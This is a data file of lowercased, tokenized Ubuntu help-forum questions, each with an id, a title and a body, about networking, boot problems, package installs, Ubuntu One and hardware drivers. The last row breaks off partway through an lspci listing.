58737	how can i share my internet connection ?	i am trying to share my internet ( lan ) connection using an ad-hoc wifi network , but my ipod can not see it . i have `` method : shared to other computers '' set up in ipv4 in the eth0 window and `` method : dhcp '' in ipv4 in the wlan0 tab . why is n't my ipod able to see this network ?
58738	how do i create a keyboard shortcut to load nautilus ?	i want to set up a keyboard shortcut to load nautilus . i have loaded the keyboard shortcuts program , and created a custom shortcut with the command /usr/bin/nauilus . if i change this command to point to another application ( e.g . /usr/bin/gedit ) it works beautifully . how do i get this to work for nautilus ?
58739	extract form data from a firefox profile database	i 'm in the process of moving house . my desktop is currently working in headless mode . there is n't an x server and because it 's all configured up for nvidia , forwarding is n't working ( missing nv extensions , etc ) . i need to log into my online bank account but the only place that has the account number is firefox on my desktop ! it has saved it to the field and now i need to extract it somehow . does anybody know of what i 'd need to get into it ? desperate times .
58744	`` mountall main process executable changed '' causing long boot times	i am desperately trying to improve my machine 's boot time but i can not succeed . for now i have spotted that in the verbose boot mode it stops for a longer time on this line : mountall main process ( 316 ) executable changed this is the content of fstab : # /etc/fstab : static file system information . # # use 'blkid -o value -s uuid ' to print the universally unique identifier # for a device ; this may be used with uuid= as a more robust way to name # devices that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda6 during installation uuid=03c40d10-2200-4e00-8430-a020e8fd1f23 / ext4 errors=remount-ro 0 1 # swap was on /dev/sda7 during installation uuid=e3729117-b936-4c1d-9883-aee73dab6729 none swap sw 0 0 edit : i 've tried the following : 1 . i 've reinstalled ureadahead using these instructions : sudo apt-get install -- reinstall ureadahead 2 . i 've removed any files with a file name of `` pack '' in /var/lib/ureadahead and rebooted . another pack file was created successfully . i forgot to mention : i have this script running on boot ( according to some tutorial ) : /etc/init.d/bootopts # ! /bin/sh ( /sbin/ureadahead -- daemon ) & edit2 : i added results of my hard drive test : although nothing is wrong when i boot windows : /
58747	stretch/distortion . i have a large monitor , and it makes ubuntu look so ugly	i have a fairly bad machine , but it does what i need it to do . i have a compaq presario all-in-one - cq1-2025 , and it is a 20 '' monitor . it 's a cruddy machine , as i said , but all i need it for is for web browsing , so it does what i need it to do . link http : //dicksmith.com.au/product/xc8894/compaq-presario-cq1-1210an-all-in-one-desktop # specification if you want to check it for yourself . if it 's my graphics card , i have an intel速 graphics media accelerator 3150 . however , i 've been wanting to upgrade to ubuntu for a while now . the past 3 times i 've tried it ; two out of three times i had to do a whole system reboot on my computer , shortly after restarting my computer , for the first time after i installed ubuntu . one out of three times i had to manually restart my computer because ubuntu and my computer locked up for over 20 minutes . three out of three times i had to manually restart my computer continuously during the installation of ubuntu , on account of it crashing during the installation . it just stopped responding . on top of it all , i was repulsed by the way ubuntu looked on my monitor . on windows , when you have a larger monitor , it just expands everything . on ubuntu , it tries to fill it all in , and as a result , it looks very stretched , distorted , and very low quality on my computer . i 'm not sure if this is only me , but it just looks very horrendous on my monitor . i will be getting a new laptop for school next week , however , which only has a 12 '' display . i can try it on there , and see if i get the same problem . if this is n't only me , or you have a solution that could help me fix ubuntu in my current predicament , please reply and/or answer my question . tl ; dr i have a large monitor ( 20 inches ) , and ubuntu stretches to fill it in . any way to fix it ?
58748	blank page when trying to access phpmyadmin	i would like to access phpmyadmin . i have access it before but , now , i 'm just getting a blank page and i really do n't get why . i 've installed phpmyadmin using sudo apt-get install phpmyadmin i 've run sudo gedit /etc/apache2/apache2.conf and there added : # include phpmyadmin : include /etc/phpmyadmin/apache.conf but i was getting a warning when i restart apache , telling me : the alias directive in /etc/phpmyadmin/apache.conf at line 3 will probably never match because it overlaps an earlier alias . how can i solve this , so that i can see phpmyadmin interface again , when i do http : //localhost/phpmyadmin instead of seeing a blank webpage ? dump - i 've tried apt-get remove phpmyadmin and then apt-get install phpmyadmin - still the same blank page . : ( /etc/phpmyadmin - i 've chmod o+w permissions to phpmyadmin folder and it 's contents . - still the blank page ...
58753	why does grub2 break every time i update my laptop ?	i 'm running ubuntu 11.04 . i just do n't understand it . it does n't matter if it is a kernel upgrade , or an adobe flash update . the next time i restart my computer grub2 breaks . all i get is a blinking `` _ '' . then i have to boot into a live cd , mount my fs , run sudo grub-setup -d /media/fs_name_here/boot/grub /dev/mapper/isw_blah_blah_blah and then restart , then run sudo update-grub . it only happens when there is an update . because if i do n't run anything , and i make sure to run sudo update-grub after i reinstall it then i can restart as many times as i want -- but only until i update something else . i 'm 70 % sure everything still works after i install something new . if it 'll help i 'm running a sony vaio z . there are 2 solid state chips on board that are in a raid0 array . i 've never had this problem before i just switched back to ubuntu .
58755	repair whole ntfs filesystem	i 'm searching for useful tools for repairing a whole ntfs partition / drive , not only specific files . my usecase : i 'm trying to clone a netbook drive via partimage . unfortunately the ntfs partition has errors and partimage says it could not properly read from the device and finally quits . it would save a great amount of work if i would be able to capture a disk image and copy it to a functional , new drive and reassemble the netbook . tools i already gave a try : ntfsfix - run , but no improvement chkdsk on windows xp - generating output , obviously repairing , but then quitting and leaving me with an unknown error on the partition is not really revelant data . just preventing a windows xp install and avoiding copying other files is worth trying a few things ( or would it be just elegant to tackle the big problems with a few terminal commands.. ? ) . please do n't hesitate to recommend tools that may break something . i 'm medium confident to save the partition because palimpsest ( aka disk utility ) suggests me that the disk has a few bad sectors , but is still `` healthy '' ( green knob ) . i 'm running natty and have limited , but at least sufficient terminal knowledge .
58757	rt3090 random disconnects on wifi ?	ok well i got my card to connect and all that but now it absolutely refuses to hold the connection for more than a minute or so and will not reconnect unless i reboot the system . i have a syslog here if anyone needs it http : //paste.ubuntu.com/675271/
58758	re-track current tune in main library panel	after clicking away from the library panel view , where banshee tracks the current tune , is there a way to reactivate ? in itunes there is a specific button for this . banshee will always show the current tune playing , but i can not seem to get the library view to synch again ...
58762	all-in-one web-administration tool , alternative to webmin	are there any good or possibly better alternatives for webmin ; basically i want to have one single application to monitor the entire ubuntu system/network etc . webmin is a web-based interface for system administration for unix . using any modern web > browser , you can setup user accounts , apache , dns , file sharing and much more . webmin removes the need to manually edit unix configuration files like /etc/passwd , and lets you manage a system from the console or remotely . see the standard modules page for a list of all the functions built into webmin , or check out the screenshots .
58763	why wo n't ubuntu 11.04/11.10 boot after install ?	so i have a desktop that i have been using as a way over the top media center ( specs at paste bin ) . i have successfully run 10.04 and 10.10 on this system with only a bit of shenanigans with pulse audio to smooth things out . however with 11.04 and now 11.10 i have not been able to boot passed grub all i get is a blinking cursor . i believe it is a problem with the kernel but i do n't know what to do about it . edit i ran a verbose boot from live usb and cd and it stops at this line in aprox 3.8 seconds in to the boot ohci_hcd 0000:00:12.1 : irq 16 , io mem 0xfe02d000
58766	how to make sure apt-get has the latest version of software	how to make sure apt-get has the latest version of application or software ; i tried installing monit but the latest version that i got was 1.5 from apt-get but the site http : //mmonit.com/monit/ has totally different version ie. , monit 5.2.5. sudo apt-cache search monit sudo apt-get update sudo apt-get install monit < < gives 1.5 version do i need to add the latest ppa/deb in apt-add-repository before installing . also where to find the latest for example in this case monit .
58767	keyboard sticks randomly	i have upgraded from ubuntu 10.04 to 11.04 and i encountered a strange problem with my keyboard . while i am typing sometimes the last character i typed sticks , so it acts like i keep holding the the key down without releasing it . for example if i typed `` ubuntu '' the last `` u '' could stick and would be producing `` ubuntuuuuuuuuuuuuuuuuu '' until i pressed any key on the keyboard . this happens randomly and i ca n't figure out under which circumstances this happens . i have never experienced it on ubuntu 10.04 , so i doubt that this is something wrong with my hardware .
58769	vmware workstation 6.5.5 on 10.04 faster than on 8.04 ?	now that i can finally enjoy my vmware workstation 6.5.5 on ubuntu 10.04 , i noticed that it feels significantly faster and snappier than when it is running on ubuntu 8.04 ( same exact machine , dual boot ) . is this my subjective imagination or can this be backed by known benchmarks ?
58770	developing unity compliant apps in python - where to start ?	i 'm an experienced programmer who is interested in developing apps for linux , specifically gtk , and more specifically apps that are unity compliant . aside from the obvious step of learning python , what 's the best way to learn things like : how to develop a gui interface ( probably using glade ) ? are there any good glade2 tutorials ? where are the unity specific api calls ? ( such as putting a notification icon on the top panel , and using `` badges '' on the launch icons ( a la unity mail 's message count ) . also , are there any good python ides that are similar to xcode or visual studio , where you can design your interface , and then double click on buttons and widgets to tie code to them ? thanks for any help .
58775	accessing .vdi image from ubuntu virtualbox	i have ubuntu 11.04 installed in virtualbox 4.0.10 on a windows vista home premium 32-bit host . i have a hard disk that i have added to the sata controller on the virtualbox ( a .vdi image ) . my question is , how can i access the files within that hard disk ? thank you .
58780	black screen when booting from .vdi image	i have cloned a virtualbox machine , which runs ubuntu 11.04 32-bit as guest os . i now wish to transfer it to a new host machine running windows vista 32-bit . iâve transferred the .vdi file and adjusted the name and memory . however when i boot it , the options to choose the linux version came up : ubuntu , with linux 2.6.38-10-generic , linux 2.6.38-10-generic ( recovery mode ) , previous linux versions , memory test . once i chose linux 2.6.38 a black screen just appears with an underscore at the top . what should i do to get it to run ? i donât have my original machine near me now so i can only work with my .vdi image . my vb is version 4.0.10 . i have tried cloning this vdi and also assigning a new uuid and making a new guest , but i still got the black screen . thank you .
58781	resolv.conf keeps getting reset by something	i need help figuring out why my resolv.conf keeps changing to this , causing me to not be able to access the outside internet and only the local network : $ cat /etc/resolv.conf nameserver 192.168.16.1 domain localdomain search localdomain i thought i fixed it by getting rid of the loopback interface and adding in the eth0 interface in /etc/network/interfaces with the instructions on jontsai 's posterous blog . i 've tried things like doing : $ sudo ifconfig eth0 down $ sudo ifconfig eth0 up $ sudo /etc/init.d/networking restart $ sudo dhclient and then things would work temporarily , and eventually the nameserver in resolv.conf would get reverted again . p.s . i also posted this on ubuntuforums . edit : there is at least one other program besides networkmanager that 's writing to resolv.conf , and i know this because when i refresh networkmanager , the resolv.conf file that gets generated has a comment that says # generated by networkmanager , and the version that it keeps changing to does not . so i am trying this : while true ; do echo listening ; lsof | grep /etc/resolv.conf ; echo sleeping ; sleep 1 ; done edit 2 : adding output of files : $ cat /etc/network/interfaces auto lo iface lo inet loopback auto eth0 iface eth0 inet dhcp no such file as /etc/networkmanager/networkmanager.conf $ sudo cat /etc/networkmanager/system-connections/auto\ ethernet [ connection ] id=auto ethernet uuid= # # # # # # # omitted # # # # # # # type=802-3-ethernet autoconnect=true timestamp=1314377063 [ ipv4 ] method=auto ignore-auto-routes=false ignore-auto-dns=false dhcp-send-hostname=false never-default=false [ 802-3-ethernet ] speed=0 duplex=full auto-negotiate=true mtu=0 [ ipv6 ] method=ignore ignore-auto-routes=false ignore-auto-dns=false never-default=false
58789	how to check charged percentage of battery and to adjust its thresholds ?	i was wondering how to check the current charged percentage of battery on my lenovo t400 ? i forgot which program i used to control the battery to stop charging at 60 % and start charging at 40 % . now i want to adjust the thresholds . so i wonder how to do that ?
58791	can i update the software center to 4.0 ?	is it possible to update the ubuntu software center in maverick to 4.0 ? i have tried adding deb http : //us.archive.ubuntu.com/ubuntu/ natty main to software sources but installation failed ( lot 's of version problems )
58793	did i somehow get infected with spyware or virus ?	so i was trying to install ubuntu restricted extras , and well this poped up in the terminal . www.actingcareersnow.comcasting calls for kids & teens . audition now ! ages 9 to 29 . [ 1 ] 3241 teens . : command not found kevin @ fullmetal : ~ $ talent search open call www.actingcareersnow.comcasting : command not found talent : command not found [ 1 ] + exit 127 www.actingcareersnow.comcasting calls for kids kevin @ fullmetal : ~ $ www.talentshowcase.tvchild-adult . meet top industry pros looking to interview new talent ! www.talentshowcase.tvchild-adult . : command not found kevin @ fullmetal : ~ $ casting casting calls www.actingcareersnow.comcasting calls for kids & teens . audition now ! ages 9 to 29 . talent search open call www.talentshowcase.tvchild-adult . meet top industry pros looking to interview new talent ! casting www.starnow.com/castingactors , models , musicians , dancers find work , get discovered today ! extras wanted - get jobs www.exploretalent.com/extrasaudition open calls for paid jobs ! movies , tv , theater , commercialscasting : command not found kevin @ fullmetal : ~ $ www.starnow.com/castingactors , models , musicians , dancers find work , get discovered today ! bash : www.starnow.com/castingactors , : no such file or directory kevin @ fullmetal : ~ $ extras wanted - get jobs extras : command not found kevin @ fullmetal : ~ $ www.exploretalent.com/extrasaudition open calls for paid jobs ! movies , tv , theater , commercialsucasting calls bash : www.exploretalent.com/extrasaudition : no such file or directory kevin @ fullmetal : ~ $ www.actingcareersnow.comcasting calls for kids & teens . audition now ! ages 9 to 29 . [ 1 ] 3255 teens . : command not found gagandeep @ fullmetal : ~ $ talent search open call www.actingcareersnow.comcasting : command not found talent : command not found [ 1 ] + exit 127 www.actingcareersnow.comcasting calls for kids kevin @ fullmetal : ~ $ www.talentshowcase.tvchild-adult . meet top industry pros looking to interview new talent ! www.talentshowcase.tvchild-adult . : command not found kevin @ fullmetal : ~ $ casting casting : command not found does this mean i am infected ? that message came up in the terminal .
58798	issues with metadata converting mp3- > ogg	i 'm trying to convert mp3 files to ogg , but i found a problem : most or all of the metadata is disappearing after the conversion . is there a way to keep it ?
58803	is it possible to convert a 30 second clip of an .mp3 to .wav via the command line ?	is it possible to convert a 30 second clip of an .mp3 to .wav in ubuntu terminal ? for example if i had an .mp3 that was 3:00 minutes long , would i be able to create a 30 second clip from 0:45-1:15 ? i 'm able to convert the entire song using mplayer in ubuntu . mplayer \ -quiet \ -vo null \ -vc dummy \ -ao pcm : waveheader : file= '' output.wav '' `` input.mp3 '' http : //en.linuxreviews.org/howto_convert_audio_files i 'm open to suggestions using mplayer , lame , mpg123 , mpg321 or other encoders !
58806	how do i disable my intel graphic card in asus k53sv ?	how do i disable my intel graphic card in asus k53sv . i ca n't use my nvidia gt540 . a already did as described in how do i disable intel graphics in a hybrid graphics setup ? using bumblebee . but it does n't work .
58807	bypassing excessive dependencies when installing r-base-core	i 'm trying to install r ( via r-base-core ) on an ubuntu 10.10 server . it is trying to install all of the following : the following new packages will be installed : apt-xapian-index apturl apturl-common aspell aspell-en dbus-x11 dictionaries-common docbook-xml dosfstools dpatch firefox firefox-branding fuse-utils gamin gconf2 gconf2-common ghostscript gir1.0-glib-2.0 gksu gnome-icon-theme gnome-keyring gnome-mime-data gvfs gvfs-backends hdparm hunspell-en-us indicator-application iso-codes launchpad-integration libappindicator1 libart-2.0-2 libaspell15 libatasmart4 libavahi-glib1 libbluetooth3 libbonobo2-0 libbonobo2-common libbonoboui2-0 libbonoboui2-common libbz2-dev libcairo-perl libcanberra0 libcdio-cdda0 libcdio-paranoia0 libcdio10 libcupsimage2 libdbusmenu-glib1 libdbusmenu-gtk1 libenchant1c2a libept1 libexif12 libffi5 libfuse2 libgail18 libgamin0 libgconf2-4 libgcr0 libgdu0 libgirepository1.0-1 libgksu2-0 libglade2-0 libglib-perl libgnome-keyring0 libgnome2-0 libgnome2-canvas-perl libgnome2-common libgnome2-perl libgnome2-vfs-perl libgnomecanvas2-0 libgnomecanvas2-common libgnomeui-0 libgnomeui-common libgnomevfs2-0 libgnomevfs2-common libgnomevfs2-extra libgp11-0 libgphoto2-2 libgphoto2-port0 libgs8 libgstreamer-plugins-base0.10-0 libgstreamer0.10-0 libgtk2-perl libgtop2-7 libgtop2-common libgudev-1.0-0 libgvfscommon0 libhunspell-1.2-0 libidl0 libimobiledevice1 libindicator1 libjson-glib-1.0-0 liblaunchpad-integration1 liblcms1 liblqr-1-0 libmagickcore3 libmagickwand3 libncurses5-dev libnspr4-0d libnss3-1d libntfs-3g79 libntfs10 libopenobex1 liborbit2 libpam-gnome-keyring libpango-perl libpaper-utils libpaper1 libparted0debian1 libpcre3-dev libpcrecpp0 libplist1 libpolkit-agent-1-0 libpolkit-backend-1-0 libproxy0 librarian0 libreadline-dev libreadline6-dev librsvg2-2 librsvg2-common libsgutils2-2 libsmbclient libsoup-gnome2.4-1 libsoup2.4-1 libstartup-notification0 libtdb1 libusbmuxd1 libutempter0 libvorbisfile3 libvte-common libvte9 libwbclient0 libwebkit-1.0-2 libwebkit-1.0-common libxapian15 libxaw7 libxcb-atom1 libxcb-aux0 libxcb-event1 libxmu6 libxmuu1 libxpm4 libxss1 libxv1 libxxf86dga1 mtools ntfs-3g ntfsprogs obex-data-server patchutils policykit-1 policykit-1-gnome powermgmt-base psmisc python-apt python-cairo python-dbus python-debian python-glade2 python-gnupginterface python-gobject python-gobject-cairo python-gtk2 python-software-properties python-vte python-webkit python-xapian r-base-core r-base-dev r-cran-boot r-cran-class r-cran-cluster r-cran-codetools r-cran-foreign r-cran-kernsmooth r-cran-lattice r-cran-mass r-cran-matrix r-cran-mgcv r-cran-nlme r-cran-nnet r-cran-rpart r-cran-spatial r-cran-survival r-doc-html r-recommended rarian-compat sgml-data software-properties-gtk synaptic tcl8.5 tk8.5 ubufox udisks unattended-upgrades unzip usbmuxd x11-utils x11-xserver-utils xauth xbitmaps xdg-utils xterm xul-ext-ubufox zip 0 upgraded , 204 newly installed , 0 to remove and 0 not upgraded . need to get 94.5mb of archives . after this operation , 284mb of additional disk space will be used . my infrastructure has limited space and i 'd rather not waste so much of it installing programs/libraries that can never be used on a server ( libgnome ? firefox ? ? ) why do we even have all of these dependencies ? is there a way to easily see the entire dependency tree or motivations behind each ? i really do n't care about windowing dependencies ( as they ca n't be used ) . is there any good way to force apt/dpkg to ignore them -- - or is it advisable to just compile from source ?
58811	is there a `` sync locally ? '' option in the android app of ubuntu one ?	as ubuntu one under ubuntu offers the `` sync locally '' option , i was looking for this very option inside of the ubuntu one android app , but unfortunately i did not find it . so all my folders are synced into the cloud , but no file is available for offline use as the option is missing . ticking every single file to download them is not a appropriate solution , because it takes long times to `` sync '' 100+ files manually . besides of that changes have to be `` resynced '' manually as well . to cut a long story shot : where is the `` sync locally '' option in this app ? and supposingly there is n't such an option : what is your workaround for this ? greetz rodgerwilco
58813	install ubuntu on a macbook pro using efi instead of refit or similar	i installed ubuntu on my macbook pro ( 8,1 ) a few months back using the refit method ( so it 's an emulated bios ) . i want to give efi mode a try . unfortunately i have not found a clear guide on where to begin . i have read through scattered forum posts with hints about patches needed in the kernel and things like that , but i have n't seen any comprehensive guide . i have seen this : https : //help.ubuntu.com/community/mactelsupportteam/appleintelinstallation # single-boot : % 20ubuntu % 20only that appears to be what i 'm looking for . if it is , then my question is this : is there a way to do efi and maintain a dual boot environment ? the dual boot guides on the same page require refit . if that 's not what i think it is , where can i find info on how to install with this method ?
58814	how do i add environment variables ?	i 'm running ubuntu 11.04 . i use the terminal to start a bash session , and i want to add an environment variable : $ r @ hajt : ~ $ env thevar=/example but it 's not working . it shows all the variables with thevar being the last one , but another call to env does not show thevar anymore- env | grep thevar returns nothing . similarly , scripts with export ( export thevar=/example ) or other variable assignments ( thevar=/example ) do n't add the environment variable . i know i 'm doing something wrong , i know it should be something simple , but i just ca n't find what . update : the real meaning of my question was this one : http : //stackoverflow.com/questions/496702/can-a-shell-script-set-environment-variables-of-the-calling-shell ( anyway i 'll choose the most voted answer and leave the edited title -that was n't what i was asking ) env runs a program in a modified environment , then dismisses all the changes .
58815	why does my default sound output change when i reboot ?	i have a media center computer that was working fine . i changed something and now have an odd problem . in my sound preferences , i have 2 output devices , `` internal audio digital stereo ( hdmi ) '' and `` internal audio '' . since i have my tv plugged into the hdmi port , when the hdmi option is selected , everything works great . when the other option is selected , it does not . logging in and out does n't change this setting . a reboot does . put another way : log in as regular user , ubuntu session set the output to the `` ... ( hdmi ) '' sound works log out log in as regular user , xbmc session setting stays set , sound works . however : log in as regular user set the sound output to `` ... ( hdmi ) '' sound works reboot log in as regular user , any session type no sound , sound output is back to `` internal audio '' so i suspect there is a 'default ' somewhere that i 'm missing . what did i do wrong ?
58816	installing the statet plugin in eclipse	i 'm trying to install the statet plug-in with ubuntu 10.10 . in eclipse , i go to help , install software , and put in the following domain . http : //download.walware.de/eclipse-3.7 however , i get the following error message . can not complete the install because one or more required items could not be found . software being installed : ide framework extensions 0.10.0.b201106190930e37sw ( de.walware.ecommons.ide.feature.group 0.10.0.b201106190930e37sw ) missing requirement : miscellany of ecommons core packages 0.10.0.b201106190930e37sw ( de.walware.ecommons.coremisc 0.10.0.b201106190930e37sw ) requires 'bundle org.eclipse.core.runtime 3.6.0 ' but it could not be found missing requirement : miscellany of ecommons core packages 1.0.0.b201108092000sw ( de.walware.ecommons.coremisc 1.0.0.b201108092000sw ) requires 'bundle org.eclipse.core.runtime 3.6.0 ' but it could not be found can not satisfy dependency : from : ide framework extensions 0.10.0.b201106190930e37sw ( de.walware.ecommons.ide.feature.group 0.10.0.b201106190930e37sw ) to : de.walware.ecommons.ltk.core [ 0.10.0.b201106190930e37sw ] can not satisfy dependency : from : ltk core 0.10.0.b201106190930e37sw ( de.walware.ecommons.ltk.core 0.10.0.b201106190930e37sw ) to : package de.walware.ecommons 0.0.0 can anyone help me diagnose the problem ?
58817	squid proxy not working , using ubuntu server 10.04 and two nics . one is connected to wan and other to lan	i am trying to setup a proxy server but i am unable to do it . here is the details of my setup i have one server ( ibm x3800 series ) and one desktop pc . server is having to network card connected to it . eth0 and eth1 . eth0 is connected to wan via global ip of 202 series and internet is working fine on server , i can connect to internet . eth1 is connected to switch and below is config in eth1 ip : 192.168.2.2 netmask : 255.255.255.0 gateway : 192.168.2.1 network : 192.1968.2.0 broadcast : 192.168.2.255 i have simply installed the squid proxy using apt-get install squid . i have changed the file /etc/squid/squid.conf and added the below details httpd_accel_host virtual httpd_accel_port 80 httpd_accel_with_proxy on httpd_accel_uses_host_header on acl lan src 192.168.2.0/24 http_access allow lan and finally added these iptable rules iptables -t nat -a prerouting -i eth1 -p tcp -- dport 80 -j dnat -- to globalip:3128 iptables -t nat -a prerouting -i eth0 -p tcp -- dport 80 -j redirect -- to-port 3128 where globalip is the ip of eth0 . now the desktop pc is connected to server via switch and the ip configuration for desktop pc is this ip : 192.168.2.4 netmaskapt-get install squid : 255.255.255.0 gateway : 192.168.2.1 network : 192.1968.2.0 broadcast : 192.168.2.255 i can easily ping from desktop to server and from server to desktop . but my desktop system can not access the internet . so i guess that the problem is with the squid . please help me to solve this issue . if you need any other information then please let me know . thanks
58821	how safe is eu-based ubuntu one cloud data ?	at the office 365 launch , gordon frazer , managing director of microsoft uk , gave the first admission that cloud data — regardless of where it is in the world — is not protected against the usa patriot act . the same goes for data stored in the ubuntu one cloud ? http : //blog.ucilia.com/index.php/cloud-technology-cloud-servers-cloud-telephony-news/60-how-safe-are-eu-based-cloud-data.html
58824	how can i prevent ubuntu one from displaying the same notification over and over ?	ubuntu one is displaying notifications about synchronising the same file ( s ) over and over and over again , although the file ( s ) ha ( s/ve ) not been changed . i see this notification every time i start the system or resume from standby , and even while running the session the notification appears irregularly , but often . the text of the notification is : english singular : ' % ( filename ) s ' and % ( other_files ) d other file is being uploaded to your personal cloud . english plural : ' % ( filename ) s ' and % ( other_files ) d other files are being uploaded to your personal cloud . current german [ 0 ] : » % ( filename ) s« und % ( other_files ) d andere datei werden in ihren persönlichen online-speicher hochgeladen . ( see here . ) so what can i do to get rid off these useless notifications ?
58825	is there any software solution for office ergonomics ?	is there any kind of software that is lightweight , configurable in a lan environment for office ergonomics . office ergonomics is about improving productivity by and reducing complaints from workers and reducing lost work time incidents .
58829	i ca n't see the purchased files	yesterday i purchased an album with ubuntu one , but i ca n't see the files . i logged in but i ca n't see them in the `` purchased '' folder , also the player says `` queued '' , but it never changes .
58844	apps that can control the charge/discharge of batteries	i will like to know the pros and cons of any program out there that automatically stops the charging of laptop batteries at certain percentage levels .
58847	how to change the toolbar separator image ?	is there any way to change the toolbar separator image or make it transparent ? this affects all applications such as : nautilus , gedit ... n.b . my theme isnt the default theme , its lion theme from dolsilwa ( deviantart ) . i 'm using ubuntu 11.04 ( gnome classic ) .
58849	how to protect a computer name from being disclosed to network peers ?	i 'd prefer my hostname to be hidden ( or a fake hostname to be shown - both variants are interesting actually ) from my network peers ( including routers ad dhcp servers ) . i believe my ip and mac addresses are enough for them to know . how to achieve this in ubuntu ? in practice i 've seen soho wireless routers to detect client 's ( clientside-set ) hostnames showing them on their dhcp lease tables . not sure if this works with ubuntu , but with windows i 'm pretty sure . i 'd like to avoid this in all the oses i use , ubuntu being the main of them .
58850	can i remove the mounted drives launcher icons in unity 2d ?	application 's launcher icons can be removed using gconf-editor , but mounted drives appear on the launcher at all times ( i auto-mount storage drives for my users ) . in unity 3d these can be removed by following these instructions , is this possible in unity2d ?
58851	when i want to reload synaptic package manager , i get an error	when i click reload after few minutes i get this error : w : failed to fetch gzip : /var/lib/apt/lists/partial/ir.archive.ubuntu.com_ubuntu_dists_natty_ universe_binary-i386_packages hash sum mismatch , e : some index files failed to download . they have been ignored , or old ones used instead . how do i fix this ?
58852	rote copying the settings/preferences of a user to other users	i have installed ubuntu , with username andy , let 's say i want to create accounts for ben , chris , dave and ethan , all of whom i want to have non-admin rights and precisely the same ( initial ) settings ... except their home folder . suppose i set up ben 's account , as i want it , for example : libre office writer saves as .doc , weather-indicator is set to computer 's address , launcher icons are where i choose , desktop background etc . is there a way i can then set up chris 's , dave 's and ethan 's to ( initially ) behave in exactly the same way ( with the exception of different home folders ) ? at the moment , i am going through the motions four times !
58861	is it posible to install gnome-shell extensions like in fedora 15 ?	i am running the latest ubuntu 11.10 system up-to-date with gnome-shell version 3.1.5 i 've tried to install noally and poweroption extensions to gnome-shell via extracting them to ./local/share/gnome-shell/extensions/ i 've restarted the ui and also the comp many times , i 've also modified the metadata for the gnome-shell version to 3.1.5 per each extension but no signs of the extension working . edit : using the looking glass i found errors which say that it could n't load each of the extensions because they are not compatible with the version of gnome shell or gjs
58865	can i sync two android devices to the same u1 account ?	i wish to sync two android mobiles ( my spouse 's and mine ) and possibly one android tablet to the same u1 account so we both can enjoy from streaming music . i know it is possible to sync few devices/pc 's to the same u1 account . does it also apply to the u1 music pack ? will we be able to stream to the two devices simultaneously ( not the same music , of course , just operating the two players separately but on the same time ) ? thanks , david .
58866	trash has reached maximum size ?	i 'm on kubuntu 11.04 , and deleting in krusader i get `` thrash has reached maximum size '' even when i have 10m in ~/.local/share/trash/files . so my question is why is that ? how do i set the allowed size of the trash bin ?
58869	how to sucessfully install redis-server , `` tclsh8.5 not found '' error	how to successfully install redis-server on ubuntu 11.04 .. i 'm getting some error ! i wanted to install the current stable redis on ubuntu 11.04 i see that in apt-repository the latest they have is maintainer : ubuntu developers < ubuntu-devel-discuss @ lists.ubuntu.com > original-maintainer : chris lamb < lamby @ debian.org > architecture : i386 source : redis version : 2:2.0.1-2 depends : libc6 ( > = 2.7 ) , adduser filename : pool/universe/r/redis/redis-server_2.0.1-2_i386.deb uname -a 2.6.38-11-generic # 48-ubuntu smp fri jul 29 19:05:14 utc 2011 i686 i686 i386 gnu/linux install procedure $ wget http : //redis.googlecode.com/files/redis-2.2.12.tar.gz $ tar xzf redis-2.2.12.tar.gz $ cd redis-2.2.12 $ make error cd src & & make test make [ 1 ] : entering directory `/home/ < username > /redis-2.2.12/src' ( cd .. ; tclsh8.5 tests/test_helper.tcl -- tags `` '' -- file `` '' ) /bin/sh : tclsh8.5 : not found make [ 1 ] : *** [ test ] error 127 make [ 1 ] : leaving directory `/home/ < usernam > /redis-2.2.12/src' make : *** [ test ] error 2
58871	how can i keep ubuntu from dropping my network connection when it goes to sleep/hibernate mode ?	i have my computer running a minecraft server as well as sshd ( so i can sign in and check on things ) , but if i leave my computer on for about a day it goes into sleep then eventually hibernation mode and drops my network connection , rendering the servers useless . is there any way i can change it so that it does n't drop the connection when it goes to sleep or hibernates , or just does n't hibernate or sleep ? i am not running ubuntu-server , just the desktop version ( 10.04 ) .
58872	ubuntu not using full resolution of lcd after switching to unity from ubuntu classic	i had been using ubuntu classic with 11.04 for sometime . i tried switching to unity and found that it doesnt use the full lcd . theres a `` black border '' or unused portion of my lcd although the resolution remains at 1920x1080
58873	browsing more applications ( installed ) in unity	i just switched from classic to unity and found that i cant locate my other apps in the dashbord . i click `` more apps '' and nothing happens ... i suspect i 'm missing some packages as i actually installed a command line or bare system via the alternate cd ( command line install option )
58877	error saying `` unable to update ice authority '' while booting	i often get an error saying unable to update ice authority . is there a way out of this ?
58881	wireless driver not detected	when typing iwconfig i only get `` no wireless extensions '' how do i get the ubuntu wireless driver to be detected ? lspci : 00:00.0 host bridge : ati technologies inc rs690 host bridge 00:01.0 pci bridge : ati technologies inc rs690 pci to pci bridge ( internal gfx ) 00:04.0 pci bridge : ati technologies inc device 7914 00:05.0 pci bridge : ati technologies inc rs690 pci to pci bridge ( pci express port 1 ) 00:06.0 pci bridge : ati technologies inc rs690 pci to pci bridge ( pci express port 2 ) 00:12.0 sata controller : ati technologies inc sb600 non-raid-5 sata 00:13.0 usb controller : ati technologies inc sb600 usb ( ohci0 ) 00:13.1 usb controller : ati technologies inc sb600 usb ( ohci1 ) 00:13.2 usb controller : ati technologies inc sb600 usb ( ohci2 ) 00:13.3 usb controller : ati technologies inc sb600 usb ( ohci3 ) 00:13.4 usb controller : ati technologies inc sb600 usb ( ohci4 ) 00:13.5 usb controller : ati technologies inc sb600 usb controller ( ehci ) 00:14.0 smbus : ati technologies inc sbx00 smbus controller ( rev 14 ) 00:14.1 ide interface : ati technologies inc sb600 ide 00:14.2 audio device : ati technologies inc sbx00 azalia ( intel hda ) 00:14.3 isa bridge : ati technologies inc sb600 pci to lpc bridge 00:14.4 pci bridge : ati technologies inc sbx00 pci to pci bridge 00:18.0 host bridge : advanced micro devices [ amd ] k8 [ athlon64/opteron ] hypertransport technology configuration 00:18.1 host bridge : advanced micro devices [ amd ] k8 [ athlon64/opteron ] address map 00:18.2 host bridge : advanced micro devices [ amd ] k8 [ athlon64/opteron ] dram controller 00:18.3 host bridge : advanced micro devices [ amd ] k8 [ athlon64/opteron ] miscellaneous control 01:05.0 vga compatible controller : ati technologies inc rs690m [ radeon x1200 series ] 02:04.0 cardbus bridge : ricoh co ltd rl5c476 ii ( rev b6 ) 02:04.1 firewire ( ieee 1394 ) : ricoh co ltd 